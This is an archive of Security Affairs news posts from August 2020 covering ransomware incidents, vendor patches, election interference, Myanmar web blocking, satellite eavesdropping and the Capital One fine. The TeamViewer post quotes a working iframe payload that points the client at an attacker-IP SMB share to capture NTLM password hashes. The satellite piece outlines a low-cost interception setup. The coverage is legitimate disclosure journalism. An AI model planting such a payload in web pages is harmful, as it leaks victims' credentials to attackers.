Category Archives: Security Affairs

City of Lafayette (Colorado) paid $45,000 ransom after ransowmare attack

The City of Lafayette, Colorado, USA, has been forced to pay $45,000 because they were unable to restore necessary files from backup.

On July 27th, the systems at the City of Lafayette, Colorado, were infected with ransomware, the malicious code impacted phone services, email, and online payment reservation systems.

The City did not immediately disclose the cause of the outage of its systems and invited the citizens to use 911 or an alternate number for emergency services.

Now the City of Lafayette admitted they were a victim of a ransomware attack that encrypted its systems and confirmed that opted to pay a $45,000 ransom to receive a decryption tool to recover its files.

“After a thorough examination of the situation and cost scenarios, and considering the potential for lengthy inconvenient service outages for residents, we determined that obtaining the decryption tool far outweighed the cost and time to rebuild data and systems,” City of Lafayette Mayor Jamie Harkins explained in a video.

The City did not disclose technical details of the hack either the family of ransomware that infected its systems, it only stated that it does not believe any data was stolen. The City also added that credit card data was not stored on its systems, anyway it invited residents and employees to monitor their bank accounts for suspicious activity.

“Financial data appears to be recoverable from unaffected backups. Personal credit card information was not compromised, as the City uses external PCI-certified payment gateways.” reads the announcement published by the City. “There is no evidence to suggest personal data was compromised, but out of an abundance of caution, residents and employees are advised to be vigilant to monitor accounts for suspicious activity.”

The City is going to notify individuals who have personal information stored on the City’s network.

The small amount of money requested by the attackers suggests that the attackers are not one of the major ransomware gangs, like Maze, REvil, or Clop, that usually asks for a higher ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, City of Lafayette)

The post City of Lafayette (Colorado) paid $45,000 ransom after ransowmare attack appeared first on Security Affairs.

Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days

Microsoft August 2020 Patch Tuesday updates addressed 120 vulnerabilities, including two zero-days that have been exploited in attacks.

Microsoft August 2020 Patch Tuesday updates have addressed 120 flaws, including two zero-day vulnerabilities that have been exploited in attacks in the wild.

The two issues are a Windows spoofing bug and a remote code execution flaw in Internet Explorer.

The Windows spoofing flaw, tracked as CVE-2020-1464 can be exploited by an attacker to bypass security features and load improperly signed files. The flaw is related to Windows incorrectly validating file signatures.

“A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files.” reads the advisory published by Microsoft.

“In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded.”

The flaw affects many Windows OSs, including Windows 7 and Windows Server 2008, for which the IT giant will not provide security updates because the reached the end-of-life.

Microsoft confirmed that threat actors are actively exploiting the issues in attacks against Windows systems but it did not provide technical details about the attacks.

The second zero-day addressed by Microsoft is tracked as CVE-2020-1380, it is a remote code execution issue that affects the scripting engine used by Internet Explorer. The flaw is related to the way the engine handles objects in memory, it could be exploited by tricking victims into visiting a malicious website, or by opening a malicious Office document, or through a malvertising attack.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system.”

The RCE vulnerability was discovered by security researchers at Kaspersky.

Microsoft also addressed other 15 critical vulnerabilities that impact Windows, the Edge and Internet Explorer browsers, Outlook, and the .NET framework. Most of the vulnerabilities are remote code execution issues.

Microsoft August 2020 Patch Tuesday also fixed over 100 vulnerabilities, rated as important, impacting Windows, Dynamics 365, Office, Outlook, SharePoint, and Visual Studio Code. These flaws can be exploited for remote code execution, privilege escalation, XSS attacks, DoS attacks, and to disclose information.

The full list of flaws addressed by Microsoft August 2020 Patch Tuesday is available here.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft August 2020 Patch Tuesday)

The post Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days appeared first on Security Affairs.

Adobe Acrobat and Reader affected by critical flaws

Adobe has released security updates to address twenty-six vulnerabilities in the Adobe Acrobat, Reader, and Lightroom products.

Adobe has released security updates to address tens of vulnerabilities in Adobe Acrobat, Reader, and Lightroom products.

Eleven out of twenty-six flaws are rated as ‘Critical’ because they could be exploited by attackers to remotely execute arbitrary code or bypass security features on vulnerable computers.

APSB20-48 Security updates available for Adobe Acrobat and Reader

Adobe has released security updates that address 25 vulnerabilities in Adobe Acrobat and Reader products, 11 flaws are rated as ‘Critical.’

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by the company.

Below the list of the addressed issues.

Vulnerability CategoryVulnerability ImpactSeverityCVE Number
Disclosure of Sensitive DataMemory LeakImportant   CVE-2020-9697
Security bypass Privilege Escalation ImportantCVE-2020-9714
Out-of-bounds writeArbitrary Code Execution         Critical CVE-2020-9693CVE-2020-9694
Security bypassSecurity feature bypassCritical CVE-2020-9696CVE-2020-9712
Stack exhaustionApplication denial-of-serviceImportant CVE-2020-9702CVE-2020-9703
Out-of-bounds readInformation disclosureImportant CVE-2020-9723CVE-2020-9705CVE-2020-9706CVE-2020-9707CVE-2020-9710CVE-2020-9716CVE-2020-9717CVE-2020-9718CVE-2020-9719CVE-2020-9720CVE-2020-9721
Buffer errorArbitrary Code Execution         Critical CVE-2020-9698CVE-2020-9699CVE-2020-9700CVE-2020-9701CVE-2020-9704
Use-after-free   Arbitrary Code Execution         Critical CVE-2020-9715CVE-2020-9722

APSB20-51 Security update available for Adobe Lightroom

Adobe has released a security update to address a DLL hijacking vulnerability in Adobe Lightroom that could be exploited by an attacker to execute commands with elevated privileges.

“Adobe has released updates for Adobe Lightroom Classic for Windows and macOS. This update addresses an important vulnerability. Successful exploitation could lead to privilege escalation in the context of the current user.” reads the advisory.

An attacker can exploit the flaw to get his malicious DLL being loaded at the launching of the software.

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Insecure Library LoadingPrivilege escalationImportantCVE-2020-9724

Adobe has released Lightroom Classic 9.3 to address the vulnerability.

Users of these products are recommended to upgrade to the latest versions as soon as possible.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe Acrobat)

The post Adobe Acrobat and Reader affected by critical flaws appeared first on Security Affairs.

Flaws in ‘Find My Mobile’ exposed Samsung phones to hack

A researcher found multiple flaws in Samsung’s Find My Mobile that could have been chained to perform various malicious activities on Samsung Galaxy Phones.

The security researcher Pedro Umbelino from Portugal-based cybersecurity services provider Char49 discovered multiple vulnerabilities in Samsung’s Find My Mobile that could have been chained to perform various malicious activities on Samsung Galaxy Phones.

“There are several vulnerabilities in the Find My Mobile package that can ultimately result in complete data loss for the smartphone user (factory reseting), as well as real time location tracking, phone call and message retrieving, phone lockout, phone unlock, etc. Every action that is possible for the user to perform using the web application that is passed to the device can be abused by a malicious application.” reads the report published by the security firm. “The code path to execute these actions involves several vulnerabilities being chained.”

The experts shared his findings at the DEF CON conference last week.

The “Find My Mobile” feature allows owners of Samsung devices to find their lost phones, it also allow to remotely lock a device, block access to Samsung Pay, and completely wipe the content of the device.

Char49 researcher found four vulnerabilities in Find My Mobile components that could have been exploited by a rogue app installed on the device that only requires access to the device’s SD card.

The access to the device’s SD card allows the app to trigger the first vulnerability in the attack chain, then create a file used by the attacker to intercept communications with backend servers.

Below the speech made by the experts last week at DEF CON 28SM hacking virtual conference.

The successful exploitation of the flaw would have allowed a malicious app to perform the same actions allowed by the Find My Mobile app, including force a factory reset, wipe data, locate the device, access to phone calls and messages, and lock and unlock the phone.

Char49 discovered the flaws more than a year ago, but Samsung addressed them in October 2019.

The expert explained that the exploit chain works on unpatched Samsung Galaxy S7, S8, and S9+ devices.

“This flaw, after setup, can be easily exploited and with severe implications for the user and with a potentially catastrophic impact: permanent denial of service via phone lock, complete data loss with factory reset (sdcard included), serious privacy implication via IMEI and location tracking as well as call and SMS log access,” concludes the report.

“The [Find My Mobile] application should not have arbitrary components publicly available and in an exported state. If absolutely necessary, for example if other packages call these components, then they should be protected with proper permissions. Testing code that relies on the existence of files in public places should be eliminated.”

Pierluigi Paganini

(SecurityAffairs – hacking, Samsung Find My Mobile)

The post Flaws in ‘Find My Mobile’ exposed Samsung phones to hack appeared first on Security Affairs.

Avaddon ransomware operators have launched their data leak site

Avaddon ransomware operators, like other cybercrime groups, decided to launch a data leak site where publish data of victims who refuse to pay a ransom demand.

Avaddon ransomware operators announced the launch of their data leak site where they will publish the data stolen from the victims who do not pay a ransom demand.

The first group to adopt this strategy was the Maze ransomware gang in December 2019, since then other crews adopted the same stratefy, including REvil, Nefilim, and Netwalker.

The threat of exposing the victim’s sensitive data is used by the gang to force them into paying a ransom.

Cybersecurity intelligence firm Kela was the first to report that the Avaddon ransomware operators have announced on a Russian-speaking hacker forum their new data leak site.

Source BleepingComputer

The hackers have already published on the leak site 3.5MB of documents stolen from a construction company.

Let’s wait for new entries on the leak site!

Pierluigi Paganini

(SecurityAffairs – hacking, Avaddon)

The post Avaddon ransomware operators have launched their data leak site appeared first on Security Affairs.

TeamViewer flaw can allow hackers to steal System password

A severe vulnerability impacting TeamViewer for Windows, tracked as CVE 2020-13699, could be exploited by remote attackers to steal the system password.

TeamViewer has recently addressed a high-risk vulnerability (CVE 2020-13699), that could be exploited by remote attackers to steal system password and potentially compromise it.

TeamViewer is a popular software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers

The vulnerability, classified as an “Unquoted URI handler”, could be triggered by tricking the victims into visiting a malicious web site.

The vulnerability was discovered by the researcher Jeffrey Hofmann from Praetorian, it resides in the way TeamViewer quotes its custom URI handlers. The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system.

The issue in the TeamViewer’s URI scheme allows a web page crafted by the attack to trick the application installed on the victim’s system into initiating a connection to the attacker-owned remote SMB share.

This means that the SMB authentication process will leak the system’s username, and NTLMv2 hashed version of the password to the attackers.

The attacker could embed a malicious iframe on a website and then trick victims into visiting that maliciously URL. Upon clicking the link shared with the victims, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

The TeamViewer project has fixed the issue by quoting the parameters passed by the affected URI handlers.

The vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. TeamViewer released the version 15.8.3 to address the issue and users are recommended to use it.

Such kind of issues is very dangerous because of the popularity of the software that is used by millions of users.

At the time of addressing the issue, the TeamViewer team is not aware of attacks in the wild exploiting the issue.

Pierluigi Paganini

(SecurityAffairs – hacking, TeamViewer)

The post TeamViewer flaw can allow hackers to steal System password appeared first on Security Affairs.

Nefilim ransomware operators claim to have hacked the SPIE group

Nefilim ransomware operators allegedly targeted the SPIE group, an independent European leader in multi-technical services.

Researchers from threat intelligence firm Cyble reported that Nefilim ransomware operators allegedly hacked The SPIE Group, an independent European leader in multi-technical services.

The number of ransomware attacks continues to increase, hackers also steal victims’ data and threaten them to release the stolen info if they don’t pay the ransom.

During darkweb and deepweb monitoring, the Cyble Research Team discovered a post from Nefilim ransomware operators in which they claimed to have breached The SPIE Group.

Nefilim ransomware SPIE group

The ransomware gang also revealed to have stolen the company’s sensitive data.

The SPIE Group provides multi-technical services in the areas of energy and communications, it has more than 47,200 employees and in 2019 it reported consolidated revenues of €6.9 billion and consolidated EBITA of €416 million.

Nefilim ransomware operators also released the first batch of file threatens to release other documents. Cyble experts analyzed the material, the first lot of data contains around 11.5 GB.

“The data leak seems to consist of corporate operational documents which include the company’s telecom services contracts, dissolution legal documents, power of attorney documents, infrastructure group reconstructions contracts, and much more.” reported Cyble.

The Nefilim ransomware operators released a total of 65,042 files contained in 18,551 data folders.

Nefilim ransomware operators continue to be very active in this period, recently the group targeted the Dussmann group, the German largest private multi-service provider and Orange S.A., one of the largest mobile networks based in France.

Below a list of tips provided by Cyble to prevent ransomware attacks:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, SPIE group)

The post Nefilim ransomware operators claim to have hacked the SPIE group appeared first on Security Affairs.

NCSC Director warns of interference on elections tied to Russia, China, Iran

The Director of the U.S. National Counterintelligence and Security Center (NCSC) shared info on attempts of influence 2020 U.S. elections.

The Director of the U.S. National Counterintelligence and Security Center (NCSC) William Evanina shared information on ongoing operations aimed at influencing the 2020 U.S. elections.

“Many foreign actors have a preference for who wins the election, which they express through a range of overt and private statements; covert influence efforts are rarer. We are primarily concerned about the ongoing and potential activity by China, Russia, and Iran” reads the press release published by the Office of the Director of the National Intelligence.

Evanina linked the efforts to Russia, China, and Iran, he explained, for example, that Russian actors are supporting President Trump’s candidacy with a coordinated effort on both Russian television and media.

According to US intelligence, Russia is carrying out campaigns to denigrate former Vice President Biden that is considered hostile by the Kremlin.

We assess that Russia is using a range of measures to primarily denigrate former Vice President Biden and what it sees as an anti-Russia “establishment.” This is consistent with Moscow’s public criticism of him when he was Vice President for his role in the Obama Administration’s policies on Ukraine and its support for the anti-Putin opposition inside Russia.” said NCSC’s Director. “For example, pro-Russia Ukrainian parliamentarian Andriy Derkach is spreading claims about corruption – including through publicizing leaked phone calls – to undermine former Vice President Biden’s candidacy and the Democratic Party. Some Kremlin-linked actors are also seeking to boost President Trump’s candidacy on social media and Russian television.”

Iran is mainly operating to undermine U.S. democratic institutions and to divide the country ahead of the forthcoming 2020 elections. Iran-linked actors are spreading disinformation on social media and pushing anti-U.S. content.

We assess that Iran seeks to undermine U.S. democratic institutions, President Trump, and to divide the country in advance of the 2020 elections. Iran’s efforts along these lines probably will focus on on-line influence, such as spreading disinformation on social media and recirculating anti-U.S. content.” continues the statement. “Tehran’s motivation to conduct such activities is, in part, driven by a perception that President Trump’s reelection would result in a continuation of U.S. pressure on Iran in an effort to foment regime change.”

China wants that President Trump will lose the presidential elections since Beijing considers him unpredictable.

“We assess that China prefers that President Trump – whom Beijing sees as unpredictable – does not win reelection. China has been expanding its influence efforts ahead of November 2020 to shape the policy environment in the United States, pressure political figures it views as opposed to China’s interests, and deflect and counter criticism of China. Although China will continue to weigh the risks and benefits of aggressive action, its public rhetoric over the past few months has grown increasingly critical of the current Administration’s COVID-19 response, closure of China’s Houston Consulate, and actions on other issues.” continues the statement. “For example, it has harshly criticized the Administration’s statements and actions on Hong Kong, TikTok, the legal status of the South China Sea, and China’s efforts to dominate the 5G market. Beijing recognizes that all of these efforts might affect the presidential race.”

Evanina warns that foreign states will continue to use covert and overt influence actions to influence the Presidential elections. The Directors also warns of the attempt of compromising the election infrastructure for multiple purposes, including interfering with the voting process, stealing sensitive data, or calling into question the validity of the election results.

In July, Evanina published another analysis of foreign threats to the U.S. 2020 presidential election warning of coordinated efforts of foreign nation-sponsored actors to interfere with elections through traditional and social media.

“At the most basic level, we encourage Americans to consume information with a critical eye, check out sources before reposting or spreading messages, practice good cyber hygiene and media literacy, and report suspicious election-related activity to authorities,” he said.

Pierluigi Paganini

(SecurityAffairs – hacking, Presidential elections)

The post NCSC Director warns of interference on elections tied to Russia, China, Iran appeared first on Security Affairs.

INTERNET BLOCKING IN MYANMAR – SECRET BLOCK LIST AND NO MEANS TO APPEAL

The list of sites blocked in MYANMAR includes many websites that did not fall under the categories adult content or fake news

Original post at: https://www.qurium.org/alerts/myanmar/internet-blocking-in-myanmar-secret-block-list-and-no-means-to-appeal

In March 2020, The Ministry of Telecommunications (MoTC) issued a directive to all operators in Myanmar with a secret list of 230 sites to be blocked due to the nature of the content; adult content and fake news. The order was based on article 77 of the Telecommunications Law and the MoTC directive stipulated that the list of blocked sites was confidential and could not be made public. If an operator publicized the list, it would be in violation of the directive and local law. However, the block list included many websites that did not fall under the categories “adult content or fake news”. Several legitimate and acknowledged media related to minority ethnic groups and news focusing on the Rakhine state were found on the list.

Telenor Myanmar – an attempt to resistance

There are four operators in Myanmar: state-owned Myanma Posts and Telecommunications (MPT), Qatar based Ooredoo, military-aligned Mytel, and privately owned Telenor Myanmar. Telenor initially challenged the blocking, and on March 23, Telenor Myanmar’s spokesperson said:

“Telenor Myanmar has not complied with the request to block sites in the category of ‘fake news’ as it has not been able to establish sufficient legal basis for this part of the request. Telenor Myanmar believes in open communication and regrets if any inconvenience is caused to the customers”

However, “dialogue with the authorities made it clear that non-compliance with the directive would have implications on the company’s ability to service the public” says Cathrine Stang Lund, Acting VP Communications at the Telenor Group, Singapore. In April 2020, Telenor complied with the directive and blocked ALL sites on the block list. In a press release from April 22, Telenor stated:

“Telenor has assessed that the risk involved in not following the directive as regards fake news is likely to have wider implications in terms of servicing the public. Hence, the remaining sites have been blocked bringing the total count to 230.”

Five months later, several legitimate and trusted news sites such as Mandalay In-Depth NewsKarenNews and Voice of Myanmar, remain blocked in Myanmar.

How is the blocking implemented?

In collaboration with the civil society organization Myanmar ICT for Development Organization (MIDO), Qurium has investigated the blocking methods implemented by Telenor Myanmar and the state-owned operator Myanma Posts and Telecommunications (MPT).

During the joint research with MIDO, traffic was recorded from Telenor (AS133385) and MPT inside Myanmar (AS9988) to a number of blocked legitimate news sites that had been classified as “fake news”. Our findings show that both Telenor and MPT block websites using DNS tampering. MPT is ignoring the DNS requests to the blocked domains, while Telenor is redirecting them to an IP address outside of the country.

Telenor – redirects blocked users to anonymous foreign server

.pw domains are inexpensive and often used by spammers.

The blocking mechanism of Telenor is curious and requires a bit of attention. Telenor redirects all users attempting to access a blocked domain to an inexpensive VPS outside of Telenor’s own infrastructure under a non-Telenor domain. The VPS (IP address 167.172.4{.}60) is hosted in Digital Ocean, Singapore under the domain urlblocked.pw, a domain purchased in late March 2020 for less than 2 USD.

According to Stang-Lund at Telenor Myanar, the reason for using an external domain hosted in Singapore as landing page is to protect the users. She says “this (decision) is based on a holistic evaluation, including privacy considerations, as user data on attempted access is outside of Myanmar’s jurisdiction”.

However, when redirecting blocked users to a Digital Ocean VPS in Singapore (outside of Telenor’s infrastructure), Telenor puts the readers in greater risk as the traffic leaves Telenor’s control and travels via several unknown operators. Qurium has requested a clarification from Telenor Myanmar on why Telenor did not place the block page within its own infrastructure (but outside of Myanmar’s jurisdiction), but have not received an answer.

Image
Telenor’s anonymous block page under the obscure domain urlblocked.pw.

The block page provides the user a brief message in Burmese and English. The message does neither indicate that it is coming from Telenor nor provide means to appeal the blocking decision.

“Sorry, this URL is not available from Myanmar. You have tried to access a web page which has been blocked as per directive received from the Ministry of Transport and Communications Myanmar..”

Cathrine Stang-Lund explains “Since the authorities have not provided a complaint or appeal mechanism, nor contact details, Telenor Myanmar is unfortunately unable to provide that on the landing page. Any appeal should be made to the authorities.” Adding this information to the block page would increase the transparency and trustworthiness of Telenor Myanmar.

The block page uses the domain “urlblocked.pw” registered the 26th of March 2020 with a free Let’s encrypt certificate.

 Domain Name: URLBLOCKED.PW
 Registry Domain ID: D180106494-CNIC
 Registrar WHOIS Server: whois.namesilo.com
 Registrar URL: https://www.namesilo.com
 Updated Date: 2020-03-31T03:01:23.0Z
 Creation Date: 2020-03-26T02:55:00.0Z
 Registry Expiry Date: 2021-03-26T23:59:59.0Z
 Registrar: NameSilo, LLC

To confirm the domain ownership, Qurium tried to reach the domain owner via an online form provided by nic.pw. A month later, no response has been provided.

The mail account hostmaster@urlblocked.pw, published as contact details in DNS, bounces all incoming mails.

Blocking without accountability

There are several aspects of the Internet blocking in Myanmar that raise questions. In this section we have collected the open questions that still are unanswered.

  1. Why does not the MoTC release a public list of all blocked sites? How come that the block list is secret?
  2. Why does not MoTC provide a complaint or appeal mechanism, or at least contact details for questions regarding the blocking?
  3. Why did Telenor decide to use a VPS hosted in a third party provider to host the blocking page instead of using a server within the Telenor infrastructure?
  4. Why is this VPS hosted outside Myanmar, implying that visitors to blocked sites are redirected to a server outside of the jurisdiction of Myanmar?
  5. Why did Telenor register the domain urlblocked.pw without a proper contact information? Blocked websites have no means to identify and contact the organization responsible of the blocking and exercise their rights to object.
  6. Internet blocking is normally requested by the Ministry of Transport and Communication, but in order to force operators to implement the blocking, a legal decree is required. Did the operators receive such a decree from the Ministry of Justice of Myanmar?

Circumvention of Internet blocking

To circumvent Internet blocking of legitimate news sites, human rights organizations and LGBTQI initiatives, Qurium has developed the mirroring service Bifrost. Bifrost creates live-mirrors of WordPress sites, and pushes the content to large cloud storage services like Google or Amazon, which are too expensive for governments to block. In the case of Myanmar, Qurium has chosen to mirror In-Depth News Mandalay, a legitimate local news site focusing on the Mandalay region. The news site was blocked in March 2020 under the category “fake news”, after being openly critical against military violence and government corruption.

Further reading – OONI research report

For further reading on current situation of Internet blocking in Myanmar, we recommend the article “Myanmar blocks websites amid COVID19” published by OONI in May 2020.

About the author:

About the authors – Contacts:

Forensic report: Tord Lundström, Qurium Media Foundation < t@virtualroad.org >

Media: Clara Zid, Qurium Media Foundation < info@virtualroad.org >

Pierluigi Paganini

(SecurityAffairs – hacking, Myanmar)

The post INTERNET BLOCKING IN MYANMAR – SECRET BLOCK LIST AND NO MEANS TO APPEAL appeared first on Security Affairs.

Spying on satellite internet comms with a $300 listening station

An attacker could use $300 worth of off-the-shelf equipment to eavesdrop and intercept signals from satellite internet communications.

The academic researcher James Pavur, speaking at Black Hat 2020 hacking conference, explained that satellite internet communications are susceptible to eavesdropping and signal interception. Attackers could use cheap equipment like a basic home-television gear that goes from $300 to spy on the internet traffic for high-value targets.

When a satellite ISP attempt to establish an internet connection for a customer, it beams that customer’s signals up to a geostationary satellite using a narrow communications channel. Then the signal is sent back down to a terrestrial receiving station and routed to the internet.

The response signals are sent back using the same channel, the transmission downlink between the satellite and the user will be a broadcast transmission that contains the larger volume of customers’ traffic simultaneously in order to optimize the costs.

“A critical difference is that we’re going to send [downstream signals] in a really wide beam, because we want to cover as many customers as possible, and satellites are very expensive,” explained Pavur. “So radio waves carrying a response to a Google search will reach our customer in the middle of the Atlantic Ocean; but they will also hit an attacker’s dish in, say, Ghana.”

Pavur explained that nation-state actors could use very expensive equipment in installed ground stations to eavesdrop on satellite communications. However, he demonstrated that it is possible to spy on satellite internet connections using basic home-television consumer equipment.

The boffin used a common flat-panel satellite dish and an off-the-shelf PCIe satellite tuner card to realize the listening station. Pavur pointed out that professional PCIe tuner cards cost between $200 and $300, but it is possible to use less reliable and cheaper versions that go for $50/$80.

satellite internet comms equipment

The researchers explained that an attacker could spy on specific satellites, whose locations are public, by pointing them with the dish. Then they could use software like EPS Pro to discover internet feeds.

“We’re going to point our satellite dish at a spot in the sky that we know has a satellite, and we’re going to scan the Ku band of the radio spectrum to find signals against the background noise,” Pavur explained. “The way we’ll identify channels is by looking for distinct humps in the radio spectrum; because they stick out against the background noise, we can guess that there’s something going on there. We’ll tell our card tune to this one, and treat it as a digital video broadcasting for satellite feed. After a few seconds we get a lock on that feed, meaning we successfully found a connected satellite.”

Once discovered a feed the attacker have to record it and analyze the collected data in order to determine whether the traffic is related to an Internet connection or a TV feed. Pavur explained that this check is quite simple, he just looked for the presence of the string HTTP which is associated with Internet traffic and not in a TV feed.

Once the attacker has identified a satellite internet connection he can record it and then parse it for valuable information. The feed are transmitted in MPEG video streaming format or the generic stream encapsulation (GSE) protocols.

MPEG is easy to parse using commonly available tools like Wireshark, while GSE leverage more complicated modulations that make it hard for cheap hardware to parse the stream.

Pavur and his colleagues noticed that most of the traffic they collected resulted in corrupted files, for this reason, they developed a tool called GC Extract to extract IP data out of a corrupted GSE recording.

“What this means is that an attacker who’s listening to your satellite signal gets to see what your internet service provider would expect to see: Every packet that comes to your modem, every BitTorrent you download, every website you visit,” Pavur said. “But it gets even worse if we look at enterprise customers, because a lot of them were operating what was essentially a corporate land network over the satellite feeds. For example, imagine a cruise line that has a bunch of Windows devices aboard it ships. This Windows local area network with all that internal LDAP traffic and SDP traffic will be broadcast over the satellite link, giving an eavesdropper perspective from behind the firewall.”

Pavel explained that attackers could also collect information even when the traffic is encrypted. The analysis of DNS could reveal the user’s Internet browsing history while the analysis of TLS certificates could allow fingerprinting the servers the user connected.

The researcher presented some real cases in which he was able to access data sent on satellite internet connections.

The researchers and his Oxford team disclosed their findings to the test victims and ISPs.

The Federal Bureau of Investigation released a private threat-intelligence notification following the presentation of the results of the research.

“However, recently conducted research discovered man-in-the-middle attacks against maritime VSAT signals can be conducted with less than $400 of widely available television equipment, a presenting opportunities to a wider range of threat actors to potentially gain visibility into sensitive information.” reads the notification published by the FBI.

“The internet is a weird web with devices and systems that are connected in ways that you can never predict, you might connect to a secure Wi-Fi hotspot or a cell tower, but the next hop could be a satellite link or wiretapped Ethernet cable,” Pavur concluded. “Having the right, the ability and the knowledge to encrypt your own data, and to choose to do that, is critical to protecting against this class of attack, whatever domain you think about it in.”

The Presentation Slides are available here:

Pierluigi Paganini

(SecurityAffairs – hacking, satellite)

The post Spying on satellite internet comms with a $300 listening station appeared first on Security Affairs.

Security Affairs newsletter Round 276

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

A critical flaw in wpDiscuz WordPress plugin lets hackers take over hosting account
FBI issued a flash alert about Netwalker ransomware attacks
Garmin allegedly paid for a decryptor for WastedLocker ransomware
QNAP urges users to update Malware Remover after QSnatch joint alert
Belarussian authorities arrested GandCrab ransomware distributor
Ghostwriter disinformation campaign aimed at discrediting NATO
Hackers stole €1.2m worth of cryptocurrency from 2gether
Havenly discloses data breach, 1.3M accounts available online
Reading the 2020 Cost of a Data Breach Report
Maze Ransomware operators published data from LG and Xerox
NetWalker ransomware operators have made $25 million since March 2020
UberEats data leaked on the dark web
US govt agencies share details of the China-linked espionage malware Taidoor
Cyber Defense Magazine – August 2020 has arrived. Enjoy it!
Exclusive: TIMs Red Team Research finds 4 zero-days in WOWZA Streaming Engine product
Flaw in popular NodeJS ‘express-fileupload module allows DoS attacks and code injection
Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers
NSA releases a guide to reduce location tracking risks
FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life
Hackers can abuse Microsoft Teams updater to deliver malicious payloads
Netwalker ransomware operators claim to have stolen data from Forsee Power
Did Maze ransomware operators steal 10 GB of data from Canon?
Google Threat Analysis Group took down ten influence operations in Q2 2020
Intel investigates security breach after the leak of 20GB of internal documents
Reddit massive hack: hackers defaced channels with pro-Trump messages
FBI warns of Iran-linked hackers attempting to exploit F5 BIG-IP flaw
Qualcomm and MediaTek Wi-Fi chips impacted by Kr00k-Like attacks

Pierluigi Paganini

(SecurityAffairs – cyber security, newsletter)

The post Security Affairs newsletter Round 276 appeared first on Security Affairs.

US OCC imposed an $80 Million fine to Capital One for 2019 hack

US Office of the Comptroller of the Currency (OCC) regulator has fined the credit card provider Capital One Financial Corp with $80 million over 2019 data breach.

The US Office of the Comptroller of the Currency (OCC) has imposed an $80 million fine to the credit card provider Capital One Financial Corp over 2019 data breach. Capital One, one of the largest U.S. card issuer and financial corporation, in 2019 it suffered a data breach that exposed personal information from more than 100 million credit applications.

A hacker that goes online with the handle “erratic” breached the systems at Capital One and gained access to personal information from 106 million Capital One credit applications.

Law enforcement identified and arrested the hacker behind the attack, he was a former Seattle technology company software engineer named Paige A. Thompson (33).

Paige Thompson is a transgender woman suspected to be the hacker behind the Capital One hack and attacks on 30 other organizations, in August 2019 he has been indicted on wire fraud and computer fraud.

The Office of the Comptroller of the Currency (OCC) is an independent bureau within the United States Department of the Treasury that was established by the National Currency Act of 1863 and serves to charter, regulate, and supervise all national banks and thrift institutions and the federally licensed branches and agencies of foreign banks in the United States.

The OCC claims that Capital One failed to implement an appropriate risk management process before migrating its IT operations to a public cloud-based service.

“The OCC took these actions based on the bank’s failure to establish effective risk assessment processes prior to migrating significant information technology operations to the public cloud environment and the bank’s failure to correct the deficiencies in a timely manner.” reads the press release published by the OCC”In taking this action, the OCC positively considered the bank’s customer notification and remediation efforts.”

The Bank also failed the implementation of an appropriate design and implementation of certain network security controls, adequate data loss prevention controls, and effective dispositioning of alerts.

The OCC pointed out that the internal audit conducted by Capital One failed to identify numerous control weaknesses and gaps in the cloud operating environment. The audit did not report on identified weaknesses and gaps to the Audit Committee.

The conduct of the bank was not compliant with the “Interagency Guidelines Establishing Information Security Standards” that are imposed on all the US banks.

Paige also accessed names, addresses, zip codes/postal codes, phone numbers, email addresses, dates of birth, and self-reported income, along with portions of credit card customer data, including: 

  • Customer status data, e.g., credit scores, credit limits, balances, payment history, contact information
  • Fragments of transaction data from a total of 23 days during 2016, 2017 and 2018

The hacker accessed bank account numbers and Social Security numbers only for a limited number of customers:

  • About 140,000 Social Security numbers of our credit card customers
  • About 80,000 linked bank account numbers of our secured credit card customers

The OCC also ordered Capital One Finance to enhance its cybersecurity security posture and share a plan to the OCC within 90 days detailing the process to do it.

Pierluigi Paganini

(SecurityAffairs – hacking, Capital One)

The post US OCC imposed an $80 Million fine to Capital One for 2019 hack appeared first on Security Affairs.

Homoglyph attacks used in phishing campaign and Magecart attacks

Researchers detailed a new evasive phishing technique that leverages modified favicons to inject e-skimmers and steal payment card data covertly.

Researchers from cybersecurity firm Malwarebytes have analyzed a new evasive phishing technique used by attackers in the wild in Magecart attacks. The hackers targeted visitors of several sites using typo-squatted domain names, and modified favicons to inject software skimmers used to steal payment card information.

The technique is known as homoglyph attack, it was involved in phishing scams with IDN homograph attacks.

“The idea is simple and consists of using characters that look the same in order to dupe users,” reads the analysis published by Malwarebytes researchers. “Sometimes the characters are from a different language set or simply capitalizing the letter ‘i’ to make it appear like a lowercase ‘l’.”

